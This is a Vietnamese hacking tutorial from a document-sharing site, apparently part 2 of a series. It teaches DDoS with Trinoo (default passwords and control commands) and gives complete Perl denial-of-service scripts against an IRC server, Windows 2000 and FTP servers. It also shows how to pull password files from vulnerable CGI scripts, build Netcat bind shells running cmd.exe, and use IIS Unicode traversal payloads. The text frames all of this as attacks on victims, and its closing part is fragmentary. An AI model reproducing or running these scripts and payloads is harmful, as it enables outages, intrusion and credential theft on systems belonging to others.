1. Trang chủ
  2. » Công Nghệ Thông Tin

Những hiểu biết cơ bản để trở thành Hacker 2

13 2,1K 12
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 13
Dung lượng 81 KB

Nội dung

Những hiểu biết cơ bản để trở thành Hacker 2

Những hiểu biết bản nhất để trở thành Hackertrang này đã được đọc lần 41 . ) Tấn công DDoS thông qua Trinoo : _ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằngTrinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫncho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu.Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫnđến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định ._ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biếtpasswd thì mới thể điều khiển được chúng , điều này không gì khókhăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thườngđược mã hoá và bạn thể thiết lập khi biên dịch Trinoo từ Source ----->Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhậpvào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhậpđúng thì nó sẽ tự động chạy trên nền của hệ thống .attacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is '^]'.kwijiboConnection closed by foreign host. < == Bạn đã nhập saiattacker$ telnet 10.0.0.1 27665Trying 10.0.0.1Connected to 10.0.0.1Escape character is '^]'.betaalmostdonetrinoo v1.07d2+f3+c [rpm8d/cb4Sx/]trinoo> < == bạn đã vào được hệ thống trinoo_ Đây là vài passwd mặc định :“l44adsl": pass của trinoo daemon ."gorave": passwd của trinoo master server khi startup ."betaalmostdone": passwd điều khiển từ xa chung cho trinoo master ."killme": passwd trinoo master điều khiển lệnh "mdie" ._ Đây là một số lệnh dùng để điều khiển Master Server:CODE die------------------------------------------------------------Shutdown.quit------------------------------------------------------------Log off.mtimer N----------------------------------------------------Đặt thờI gian để tấn côngDoS , vớI N nhận giá trị từ 1--> 1999 giây .dos IP-------------------------------------------------------Tấn công đến một địa chỉIP xác định .mdie pass---------------------------------------------------Vô hiệu hoá tất cả cácBroadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới ("d1e l44adsl")Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục nàymping--------------------------------------------------------Gửi một lệnh ping tới ("pngl44adsl") c¸c Broadcast. mdos <ip1:ip2 > ------------------------------------------Send nhiều lênh DOS ("xyz l44adsl123:ip1:ip2") đến các Broadcast. info-------------------------------------------------------------Hiển thị thông tin vềTrinoo .msize----------------------------------------------------------Đặt kích thước đệm chonhững gói tin được send đi trong suốt thờI gian DoS. nslookup host----------------------------------------------Xác định tên thiết bị củaHost mà Master Trinoo đang chạy .usebackup---------------------------------------------------Chuyển tớI các file Broadcast saolưu được tạo bởi lệnh “killdead”.bcast-----------------------------------------------------------Liệt kê danh sách tất cảcác Broadcast thể khai thác .help [cmd] ---------------------------------------------------Đưa ra danh sách các lệnh .mstop-----------------------------------------------------------Ngừng lại các cuốc tấncông DOS . _ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:CODE aaa pass IP----------------------------------------------------Tấn công đến địa chỉ IPđã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đãxác định trong một khoảng thời gian xác định được mặc định là 120s hay từ1-->1999 s .bbb pass N-----------------------------------------------------Đặt thờI gian giới hạn chocác cuộc tấn công DOS .Shi pass--------------------------------------------------------Gửi chuỗi “*HELLO*” tớidánh sách Master Server đã được biên dịch trong chương trình trên cổng31335/UDP.png pass-------------------------------------------------------Send chuỗi “Pong” tớI MasterServer phát hành các lệnh điều khiển trên cổng 31335/UDP.die pass--------------------------------------------------------Shutdown Trinoo.rsz N------------------------------------------------------------Là kích thước của bộđệm được dùng để tấn công , nó được tính bằng byte .xyz pass 123:ip1:ip3----------------------------------------tấn công DOS nhiều mục tiêucùng lúc . 42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu nhưbị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port6667. Bạn thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: Nếu bạn dùng Unix: [hellme@die-communitech.net$ telnet irc.example.com 6667 Trying example.com . Connected to example.com. Escape character is '^]'. [buffer]Windows cũng tương tự:telnet irc.example.com 6667 Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãynhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiêncứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):CODE #!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perluse Getopt::Std; use Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto); $foo = "A"; # Đây là NOP $number = "65000"; # Đây là tất cả số NOP $data .= $foo x $number; # kết quả của $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667 $buf = "$data"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print S "$buf"; print("Data has been successfully sent to $serv\n"); sub usage {die("\n\n Lỗi WircSrv Version 5.07s thể tấn công bằng DoS \n gửi 2 64k gói tin đến server làm cho nó crash.\n -sserver_ip\n\n");} Để sử dụng cái mã này , bạn hãy save nó vào một file *.pl , rồI down chươngtrình activeperl về sài , setup nó rồi vào HĐH DOS bạn chỉ cần gọi file này ratheo lệnh sau :C:\>perl < đường dẫn đến file *.pl >( Đến bây giờ tôi sẽ không bày thật cặn kẽ nữa mà sẽ tăng dần độ khólên , nếu bạn nào nghiên cứu kỹ các bài trước thì các bạn sẽ làm đượcdễ dàng thôi )43 . ) Kỹ thuật tấn công DoS vào máy tính sử dụng HĐH Win2000 :_ Muốn sử dụng được nó , bạn phải activeperl , rồi sử dụng như hướngdẫn tương tự trên . Save đoạn mã vào file *.pl rồI dùng lệnh perl gọi nó ra :CODE #!/usr/bin/perl -wuse Socket;use Net::RawIP;use Getopt::Std;getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- ";$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");($o{'s'}&&$o{'d'})||die " Use: $0 [IP Options] [UDP Options] ","IP Options: "," -s* Đia chi nguon đe bat chuoc "," -d* Đia chi bi tan cong "," -v IP Version (def: $v) "," -t IP Type of Service (TOS) (def: $t) "," -f IP fragementation offset (def: $f) "," -T IP Time to Live (TTL) (def: $T) ","UDP Options: "," -p cong cua may tinh nan nhan (def: $p) "," -l chieu dai cua goi tin (def: $l) "," -r cai đat du lieu ngau nhien (def: ".") ","Generic: "," -n So luong goi tin ta muon gui đi (def: $n) "," -L gui goi tin lien tuc khong ngung cho đen khi may tinh cua nan nhan bi die he he"," Bai huong dan cua ANHDENDAY . ";while($n > 0){$|=1;print".";$sp=int rand 65535;$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;$nb=new Net::RawIP({ip=>{version=>$v,tos=>$t,ttl=>$T,frag_off=>$f,saddr=>$o{'s'},daddr=>$o{'d'}},udp=>{source=>$sp,dest=>$p,len=>$l,data=>$D}});$nb->send;undef $nb;!$o{'L'}&&$n--;}print"Finish! "; _ Khi gọi ra bạn hãy chọn tuỳ chọn đã ghi ở trong đó mà DoS . Nhớ là chỉdùng cho Win2000 nhé .44 . ) Kỹ thuật tấn công DoS dễ dàng nhất :_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này , nóchẳng kén gì cả và dễ thực hiện . Bây giờ tôi sẽ chia sẻ với các bạn ._ Bạn cần phải Activeperl ( lại là activepert ) đã cài sẵn , save đoạn mãsau vào file abc.pl :CODE #!/usr/bin/perl use IO::Socket; sub initiate { if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username> <password>\nVi du : perlabc.pl 127.0.0.1 21 anonymous me@\n";} $host = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; }; sub connecttoserver { print("Connect den host: $host\n"); $socket = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM ) || die "khong the connect den $host"; print "Connect thanh cong . Loggin vao .\n"; }; sub login { print "user $user\n"; print $socket "user $user\r\n"; $response = <$socket> print "$response\n"; print "pass $pass\n"; print $socket "pass $pass\r\n"; $response = <$socket> print "$response\n"; print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de ngung.\n"; }; sub doit { for (;; ){ print "retr a:/x\n"; print $socket "retr a:/x\r\n"; $response = <$socket> print "$response"; } } initiate(); connecttoserver(); login(); doit(); _Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn mãnày dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân . Nósử dụng vòng lặp không giới hạn từ hàm $socket "retr a:/x\r\n" . Khi muốnkết thúc bạn chỉ cần nhấn ctrl+C ._Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài trên .VD:perl abc.pl http://www.xxx.com/ anonymous me trong đó User name và Password thể là bất kỳ . Vậy là coi như các bạn đã biết tấn công DoS là như thế nào rồi phải không ?Đó chỉ là những cách tấn công DoS thông thường ( nhưng hậu quả thì chẳngthường thường chút nào ) , còn các kỹ thuật DoS lợi hại khác như DRDoS thì chocác bạn nghiên cứu thêm vậy . Nó rất nguy hiểm khi sử dụng lung tung nên đểdành phần đó cho các bạn nào thích và thật sự muốn nghiên cứu về nó . Tôixin dừng phần DoS tại đây . 45 . ) Tự tạo cho mình một proxy để sài :_Trong các công việc như tấn công DoS hay đột nhập vào trang Web trang bịfirewall thì bạn cần đến proxy để sài . Do đó các bạn hãy tự tạo cho mìnhmột cái proxy made in <yourname> sài cho nó oai . Bây giờ hãy làm cùng tôi ._ Trước hết bạn đăng ký một host miễn phí ở trang free.prohosting.com . Bạn hãykhai báo thông tin về bạn trong các ô nhập thông tin . Cuối cùng khi đăng ký xongbạn sẽ nhận được Mail từ trang Web này gửi đến , hãy test nó để lấy passmặc định mà nó cho bạn ._ Tiếp theo bạn vào trang www.xav.com , rồi nhấp vào link install phía dưới dòngchữ Test - script Package( tui nhớ là 2 cái tên mang chữ script này ) . Sau đóbạn nhấn "next" và nhìn ở phía dưới của trang này chữ show all verdon , bạnhãy nhấn vào đó ._ Tiếp tục bạn nhấn James Marshall ==>CGIscript ==>CGIproxy==>Next==>accept==> cho đếnkhi bạn thấy một cái bảng nhiều ô nhập thông tin . Bạn hãy nhập thông tinvào các trang đó :+ your Website : nhập địa chỉ trang Web của bạn đã đăng ký trong prohosting.com.+ FTP username : Bạn nhập username mà bạn đã đăng ký trong prohosting.com .+ FTP password : Bạn nhập passwd mà prohosting.com đã send về mail cho bạn .+ Mấy cái còn lại không cần thiết , bạn nhấp next để tiếp tục . Rồi nhấnfinish . + Cuối cùng nó sẽ cho bạn địa chỉ bạn vừa tạo cái proxy đó , bạn hãy ghinhớ nó . Sau này mỗi lần “hành động” thì bạn lại đem ra sài . 46 . ) Kỹ thuật lấy pass thông qua lỗi của một số Script :a . ) Calendar CGI Script :_ Một trong số những scripts đã tìm thấy điểm yếu đó là calendar scripts , nónằm trong thư mục cgi-bin/calendar, file config là file calendar.cfg chứa administratorusername và password để thay đổi chọn lựa cho scripts khi cần , cái này thểtìm thấy ở cuối file calendar.cfg , tuy nhiên chúng đã được mã hoá chúng ta chỉviệc dùng John The Ripper hay những công cụ khác để giải mã nó là xong :_file calendar.cfg thường đặt tại địa chỉ sau :http://www.xxx.com/cgi-bin/calendar/calendar.cfg sau khi crack xong chúng ta sẽ đến Admin Control Login vào địa chỉ :http://www.xxx.com/cgi-bin/calen ._admin.pl?admin_ Vậy là bạn đã được quyền admin rồi đó .b . ) WebBBS Script : _WebAdverts Script là một scripts cho phép webmasters hiển thị những biểu ngữ luânphiên ( quảng cáo chẳng hạn ) hay thêm vào trong trang Web , cuối cùng bạn thểsử dụng kết hợp password và username để cài đặt banners tạo một banner accountsmới , xoá accounts view sensitive info, vv.vv_Địa chỉ passwd của WebAdverts là : http://www.xxx.com/cgi-bin/advert/adpassword.txt sau khi giải mã bạn logging vào:http://www.xxx.com/cgi-bin/advert/ads_admin.pl để login như là script administrator .c . ) WWWBoard Script :_WWWBoard file password thể tìm thấy trong pasword.txt , chúng ta hãy search nóbằng từ khoá cgi-bin/wwwebboard hoặc webboard/password.txt .d . ) Mailmachine Script :_Mailmachine.cgi là một webbased mailinglist , bạn thể trông thấy file adressed.txtchứa tất cả danh sách khách đã đăng ký , những danh sách thể thấy tạinhững urls sau:http://www.xxx.com/cgi-bin/mailman/addresses.txt http://www.xxx.com/cgi-bin/maillist/addresses.txt http://www.xxx.com/cgi-bin/mail/addresses.txt bạn cũng nên tìm addresses.txt mà đôi khi chúng được đổi thành các tên khác .Chúng thể chứa các thông tin quan trọng cho phép bạn khai thác .Việc tìm ra các trang bị lỗi này hẳn các bạn đã biết , tôi sẽ không nhắclại nữa ( Nếu ai chưa biết thì vui lòng đọc lạI những phần trước ) . ======================================================Nhân đây tôi xin đính chính lại là trong các đoạn code mà tôi phân tích và postlên ở những phần trước tôi đã sơ ý không thêm ký hiệu “#” vào trướcnhững câu phân tích đó , dẫn đến việc một số bạn thắc mắc là đoạn codekhông hoạt động . Tôi thành thật xin lỗi các bạn vì sơ ý của tôi , các bạnchỉ cần lấy đoạn code đó ra và thêm vào dấu “ # ” ở phía trước dòng chúthích Tiếng Việt của tôi là được ( Thông thường tôi sử dụng dấu “ <== ” để giải thích ở phiá đuôi đoạn code đó . Các bạn hãy để ý mà fixnhé .47 . ) Các công cụ cần thiết để hack Web :_ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những côngcụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụngtrên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề”thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạnsẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhânđược nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải trênmáy “làm ăn” của mình :_ Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khicần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé )._ Công cụ thứ 2 : Bạn cần 1 shell account, cái này thực sự quan trọng đốivới bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chươngtrình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, .và shell accountđó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) cácexploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.Shell account gần giống với DOS shell,nhưng nó nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ 1 shell account, nếu bạnkhông cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu aiđó cài Unix và thiết lập cho bạn 1 shell account thì bạn thể log vào telnet(Start --> Run --> gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉbạn thể đăng ký free shell account :http://www.freedomshell.com/http://www.cyberspace.org/shell.htmlhttp://www.ultrashell.net/_Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. thể quét trênmạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xemnhững dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver ,pop3, .),server đang dùng hệ điều hành gì,loại tường lửa mà server sửdụng, .và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹthuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open), . NMAPđược đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quảntrị mạng trên thế giới.Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ ._ Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệtvời trên Win32. Nó thể quét được hơn 13000 lỗi bảo mật và nhận diệnđược 5000 exploits khác. _ Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Websitegồm những thư mục và file nào, nó thể liệt kê được cả thư mục và filecó set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Websitethì bạn phải nắm một số thông tin của Admin và Website đó. _ Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giaothức TCP hoặc UDP. Bạn thể dùng Netcat 1 cách trực tiếp hoặc sử dụngchương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitationtool do nó thể tạo được liên kết giữa bạn và server cho việc đọc và ghidữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọithông tin về Netcat bạn thể tham khảo tại http://www.l0pht.com/ ._ Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì cácexploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành cáclệnh thông qua các file *.pl ._ Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng. _ Công cụ thứ 9 : L0phtCrack là công cụ số một để Crack Password của WindowsNT/2000 ._ Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớchú ý đến các phiên bản của chúng , phiên bản nào số lớn nhất thì cácbạn hãy Down về mà sài vì nó sẽ thêm một số tính năng mà các phiên bảntrước chưa . Nếu down về mà các bạn không biết sử dụng thì tìm lại cácbài viết cũ hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thìcứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .48 . ) Hướng dẫn sử dụng Netcat :a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốnhack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biếtmột chút về Netcat .b . ) Biên dịch :_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.- hiệu chỉnh file netcat.c bằng vi: vi netcat.c+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):#define GAPING_SECURITY_HOLE#define TELNET- biên dịch: make linux- chạy thử: ./nc -h - nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lạibiến môi trường PATH trong file ~/.bashrc, thêm vào ":."PATH=/sbin:/usr/sbin: .:._ Bản Netcat cho Win không cần phải compile vì đã sẵn file nhị phân nc.exe.Chỉ vậy giải nén và chạy là xong.c . ) Các tùy chọn của Netcat :_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:CODE C:\>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] . listen for inbound: nc -l -p port [options] [hostname] [port] options:-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chếđộ steath(không hiển thị trên thanh Taskbar)-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe-h ----------- gọi hướng dẫn-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến-L ------------ buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khingắt một kết nối.-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7,Netcat sẽ không thẩm vấn DNS-o ------------ file ghi nhật kí vào file-p port ----- chỉ định cổng port-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)-s addr ----- giả mạo địa chỉ IP nguồn là addr-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnetđến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạngởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụngnetcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đếntelnetd.-u ------------- dùng UDP(mặc định netcat dùng TCP)-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây-z ------------- chế độ zero I/O, thường được sử dụng khi scan port Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080nghĩa là 1,2,3, ,8080d . ) Tìm hiểu Netcat qua các VD :_ Chộp banner của web server :Ví dụ: nc đến 172.16.84.2, cổng 80CODE C:\>nc 172.16.84.2 80HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)HTTP/1.1 200 OKDate: Sat, 05 Feb 2000 20:51:37 GMTServer: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2OpenSSL/0.9.6 PHP/4.0.4pl1Connection: closeContent-Type: text/html Để biết thông tin chi tiết về kết nối, bạn thể dùng –v ( -vv sẽ cho biết các thông tin chi tiết hơn nữa)C:\>nc -vv 172.16.84.1 80CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA(UNKNOWN) [172.16.84.1] 80 (?) openHEAD / HTTP/1.0HTTP/1.1 200 OKDate: Fri, 04 Feb 2000 14:46:43 GMTServer: Apache/1.3.20 (Win32)Last-Modified: Thu, 03 Feb 2000 20:54:02 GMTETag: "0-cec-3899eaea"Accept-Ranges: bytesContent-Length: 3308Connection: closeContent-Type: text/htmlsent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, hãy dùng -o <tên_file>. Ví dụ:nc -vv -o nhat_ki.log 172.16.84.2 80xem file nhat_ki.log xem thử nó đã ghi những gì nhé :CODE < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT Server: Ap< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) Last-Modifi< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T ETag: "0-cec-< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea" Accep< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308 Connectio< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close Conten< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm< 000000f0 6c 0d 0a 0d 0a # l dấu < nghĩa là server gởi đến netcatdấu > nghĩa là netcat gởi đến server_ Quét cổng :Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãydùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500)của host 172.16.106.1CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500(UNKNOWN) [172.16.106.1] 443 (?) open(UNKNOWN) [172.16.106.1] 139 (?) open(UNKNOWN) [172.16.106.1] 111 (?) open [...]... [1 72. 16.106.1] 80 (?) open (UNKNOWN) [1 72. 16.106.1] 23 (?) open nếu bạn cần scan các cổng UDP, dùng -u CODE [dt@vicki /]# nc -u -nvv -z 1 72. 16.106.1 1-500 (UNKNOWN) [1 72. 16.106.1] 1 025 (?) open (UNKNOWN) [1 72. 16.106.1] 1 024 (?) open (UNKNOWN) [1 72. 16.106.1] 138 (?) open (UNKNOWN) [1 72. 16.106.1] 137 (?) open (UNKNOWN) [1 72. 16.106.1] 123 (?) open (UNKNOWN) [1 72. 16.106.1] 111 (?) open _ Biến Netcat thành. .. CODE C:\>nc -nvv 1 72. 16.84 .2 8080 (UNKNOWN) [1 72. 16.84 .2] 8080 (?) open Microsoft Windows 20 00 [Version 5.00 .21 95] (C) Copyright 1985-1999 Microsoft Corp E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label Volume Serial Number is B465-452F Directory of E:\test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 26 2,499 bytes 2 Dir(s) 191,488,000... thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau : CODE [1] /scripts/ %c0%af /winnt/system 32/ cmd.exe?/c+ [2] /scripts %c1%9c /winnt/system 32/ cmd.exe?/c+ [3] /scripts/ %c1%pc /winnt/system 32/ cmd.exe?/c+ [4]/scripts/ %c0%9v /winnt/system 32/ cmd.exe?/c+ [5] /scripts/ %c0%qf /winnt/system 32/ cmd.exe?/c+ [6] /scripts/ %c1%8s /winnt/system 32/ cmd.exe?/c+ [7] /scripts/ %c1%1c /winnt/system 32/ cmd.exe?/c+... %c1%9c /winnt/system 32/ cmd.exe?/c+ [9] /scripts/ %c1%af /winnt/system 32/ cmd.exe?/c+ [10] /scripts/ %e0%80%af /winnt/system 32/ cmd.exe?/c+ [11]/scripts/ %f0%80%80%af /winnt/system 32/ cmd.exe?/c+ [ 12] /scripts/ %f8%80%80%80%af /winnt/system 32/ cmd.exe?/c+ [13]/scripts/ %fc%80%80%80%80%af /winnt/system 32/ cmd.exe?/c+ [14]/msadc/ \%e0\%80\%af / \%e0\%80\%af / \%e0\%80\%af /winnt/system 32/ cmd.exe?/c+ [15]/cgi-bin/... /winnt/system 32/ cmd.exe?/c+ [16]/samples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system 32/ cmd.exe?/c+ [17]/iisadmpwd/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system 32/ cmd.exe?/c+ [18]/_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system 32/ cmd.exe?/c+ [19]/_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system 32/ cmd.exe?/c+ [20 ]/adsamples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system 32/ cmd.exe?/c+... cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address : http://www.xxx.com/scripts/ %c1%pc /winnt/system 32/ cmd.exe?/c+ < == lỗi dòng thứ 3 hoặc http://www.xxx.com/scripts/ %c1%1c /winnt/system 32/ cmd.exe?/c+... port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix) Ví dụ: CODE E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [1 72. 16.84.1] from (UNKNOWN) [1 72. 16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trên máy tính dùng để tấn... Ví dụ: CODE netstat -a TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 1 72. 16.84.1 -p 53 -> lắng nghe ngay trên cổng 53 listening on [1 72. 16.84.1] 53 connect to [1 72. 16.84.1] from (UNKNOWN) [1 72. 16.84.1] 3163? ? Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải quyền Administrator, chỉ cần login vào với 1 username bình thường khởi... head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 26 2,499 bytes 2 Dir(s) 191,488,000 bytes free C:\test>exit exit sent 20 , rcvd 450: NOTSOCK Như các bạn đã thấy , ta thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé : CODE E:\>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ? ?... dùng udpshell thay cho netcat ( Dựa theo bài viết của 